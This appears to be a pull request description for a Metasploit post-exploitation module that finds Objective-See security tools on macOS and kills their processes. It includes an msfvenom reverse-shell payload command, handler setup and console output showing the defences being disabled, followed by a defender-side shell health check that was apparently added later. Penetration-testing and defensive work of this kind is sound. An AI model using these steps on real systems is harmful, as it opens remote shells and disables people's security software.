@gardnerapp
Contributor

This module fulfills feature request 20447 for enumerating Objective See security projects such as LuLu, BlockBlock, Do Not Disturb, ReiKey, RansomWhere and OverSight. The module checks for the presence of the .app folder for each product within the /Applications folder, i.e. /Applications/LuLu.app etc. For each of the products discovered the module will also find the pids associated with that application. Lastly, when the KILL_PROCESSES option is enabled the module will send kill signals to the application(s) pids so long as the session has root privileges.

Verification

This module should be OS version and architecture independent. The following tests were conducted on an OSX system with LuLu and BlockBlock installed. Installation for Objective See's products can be found here

1. Create a payload and start a session with a handler

```
msfvenom -p osx/aarch64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f macho -o payload && sudo chmod +x payload && sudo ./payload

msfconsole -x "use exploit/multi/handler; set payload osx/aarch64/meterpreter/reverse_tcp; set lhost 127.0.0.1; set lport 4444; run"
```

2. Once a session is obtained use the post/osx/manage/objective_see_hunter module

```
msf exploit(multi/handler) > use post/osx/manage/objective_see_killer
msf post(osx/manage/objective_see_killer) > options

Module options (post/osx/manage/objective_see_killer):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   KILL_PROCESSES  false            yes       Kills processes of installed objective see products.
                                              Requires root privileges.
   SESSION                          yes       The session to run this module on

msf post(osx/manage/objective_see_killer) > set session 1
session => 1
msf post(osx/manage/objective_see_killer) > run
[*] Retrieving process list...
[*] Enumerating Objective See security products...
[+] The following Objective See products were found installed on the system:
[*] Found LuLu with pids of [706]
[*] Found BlockBlock Helper with pids of [701, 288]
[*] Post module execution completed
```

3. (optional) Disable the products by setting KILL_PROCESSES to true

```
msf post(osx/manage/objective_see_killer) > set KILL_PROCESSES true
KILL_PROCESSES => true
[*] Retrieving process list...
[*] Enumerating Objective See security products...
[+] The following Objective See products were found installed on the system:
[*] Found LuLu with pids of [3945]
[*] Found BlockBlock Helper with pids of [3947, 3946]
[*] Attempting to kill pid(s) [3945] for LuLu
[+] Kill signal was successful for 3945
[*] Attempting to kill pid(s) [3947, 3946] for BlockBlock Helper
[+] Kill signal was successful for 3947
[+] Kill signal was successful for 3946
```

Thanks again.
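As an added defender-side example (not code from the PR or from Metasploit): a POSIX shell health check that mirrors the module's two lookups, the `.app` bundle under `/Applications` and a matching process name, and flags any installed product that has no running process, which is the state the module's `KILL_PROCESSES` option leaves behind. Bundle names for products other than LuLu and BlockBlock are assumptions, and the process list is passed in as a parameter so the check can be run on constructed input.

```shell
# Status of one product: "absent" (no .app bundle), "running" or "stopped".
#   $1 = applications directory (the module checks /Applications)
#   $2 = product name, matched as <name>.app and as a substring of process names
#   $3 = newline-separated process names, i.e. the output of `ps -axo comm=`,
#        passed in as a parameter so the check can be tested on constructed input
objsee_status() {
  apps_dir=$1; name=$2; procs=$3
  if [ ! -d "$apps_dir/$name.app" ]; then
    echo absent
    return 0
  fi
  # "BlockBlock Helper" in the PR output is matched by the product name "BlockBlock"
  if printf '%s\n' "$procs" | grep -qF -- "$name"; then
    echo running
  else
    echo stopped
  fi
}

# Check every product, print one line each, and return 1 if any installed
# product has no running process. Bundle names for products other than LuLu
# and BlockBlock are assumed to equal the product name (an assumption).
objsee_report() {
  apps_dir=${1:-/Applications}
  procs=${2:-$(ps -axo comm=)}
  rc=0
  for name in LuLu BlockBlock "Do Not Disturb" ReiKey RansomWhere OverSight; do
    st=$(objsee_status "$apps_dir" "$name" "$procs")
    echo "$name: $st"
    [ "$st" = stopped ] && rc=1
  done
  return $rc
}
```

Run `objsee_report` from a periodic job on the host; a non-zero exit is the alert condition.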
